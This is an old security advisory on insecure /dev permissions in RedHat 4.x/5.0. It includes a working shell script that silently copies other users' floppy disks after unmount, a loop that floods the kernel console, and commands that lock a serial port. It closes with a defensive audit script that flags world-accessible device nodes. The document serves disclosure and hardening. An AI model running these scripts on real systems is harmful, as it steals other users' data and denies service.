COMMAND

    /dev permissions

SYSTEMS AFFECTED

    RedHat 4.x/5.0

PROBLEM

    Michal Zalewski found two problems with /dev permissions.  The
    first is that any user can read data from a floppy (even one that
    is not mounted) using "cat /dev/fd0H1440".  That is not dangerous
    in itself, but any user may write a script which periodically
    checks whether the floppy has just been unmounted, then dumps its
    content to a file.  Here's a sample 'floppy collector':

    #!/bin/sh
    # /bin/sh is bash on Red Hat; 'let' below is a bash builtin.
    DUMP_DEV=/dev/fd0H1440
    MOUNT_DEV=/dev/fd0
    LABEL=0
    DUMPED=1
    while :; do
      sleep 1
      # Empty grep output means the floppy is not currently mounted.
      if [ "`mount|grep \"^${MOUNT_DEV}\"`" = "" ]; then
        # Dump once per unmount.
        if [ "$DUMPED" = "0" ]; then
          echo "Dumping image #$LABEL..."
          cat $DUMP_DEV >.fdimage$LABEL
          let LABEL=LABEL+1
          DUMPED=1
        fi
      else
        DUMPED=0
      fi
    done

    Also, if there's no floppy in the drive, an unprivileged user may
    flood the kernel log console (the local console by default!):

        [user@host sth]$ while :; do cat /dev/fd0H1440;done &

    It will generate  a lot of  kernel messages, which  will be logged
    to  /var/log/messages  AND  to  console (default klogd behaviour).
    Also, every printk(...) (called by fd driver) uses sync() to flush
    buffers.  It will cause abnormal hdd activity.

    The second problem (not tested with rh 5.0) is that ordinary users
    are allowed to read /dev/ttyS*.  The serial port driver disallows
    multiple access attempts at the same time, so a user may
    permanently lock a chosen port using this command:

        [user@host user]$ cat /dev/ttyS0
        (Ctrl+Z)
        [user@host user]$ cat /dev/ttyS0
        cat: /dev/ttyS0: device is busy

    The serial port is now in an unusable state.

SOLUTION

    There are also a lot of other, not-so-common devices, e.g.
    /dev/sequencer, which are world-readable or even world-writable.
    There is NO reason to give ordinary users direct access to
    hardware devices.  It's quite easy (as shown above ;) to obtain
    interesting data or cause system failure by reading/writing these
    devices.  The solution is simply to remove the read bit from those
    devices for ordinary users if it is not needed.  Another good
    solution would be to use allocatable removable media devices, as
    Sun has done with Trusted Solaris and the Solaris BSM module.
    Take a look at the scripts Darren J Moffat has written to do this
    under Linux (should actually work for anything that runs Perl) at:

        http://www.xarius.demon.co.uk/software/devalloc
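
    One way to find the device nodes the SOLUTION text is about, as an
    added example that is not part of the original advisory: the
    function reads "mode type path" lines (the format GNU find prints
    with -printf '%m %y %p\n') and reports nodes that are readable or
    writable by "other".  The allow-list and the sample modes are
    assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the advisory): flag device nodes whose "other"
# permission bits allow read or write.
# Input, one node per line: "<octal mode> <type b|c> <path>", e.g. from GNU find:
#   find /dev \( -type b -o -type c \) -printf '%m %y %p\n' | audit_dev_modes

# Assumption: nodes that are meant to be usable by every local user.
ALLOW="/dev/null /dev/zero /dev/full /dev/tty /dev/random /dev/urandom /dev/ptmx"

audit_dev_modes() {
  while read -r mode type path; do
    [ -n "$path" ] || continue                # skip blank or short lines
    case " $ALLOW " in *" $path "*) continue ;; esac
    other=$(( 0$mode & 7 ))                   # leading 0 = octal; keep "other" rwx bits
    flags=""
    if [ $(( other & 4 )) -ne 0 ]; then flags="world-readable"; fi
    if [ $(( other & 2 )) -ne 0 ]; then flags="${flags:+$flags,}world-writable"; fi
    if [ -n "$flags" ]; then
      printf '%s %s %s %s\n' "$path" "$type" "$mode" "$flags"
    fi
  done
  return 0
}

# Constructed sample listing (modes are illustrative, not from a real system).
sample_listing() {
  cat <<'EOF'
660 b /dev/fd0
666 b /dev/fd0H1440
644 c /dev/ttyS0
600 c /dev/ttyS1
666 c /dev/sequencer
666 c /dev/null
EOF
}

sample_listing | audit_dev_modes
```

    Each reported node is a candidate for "chmod o-rw" unless ordinary
    users genuinely need direct access to it.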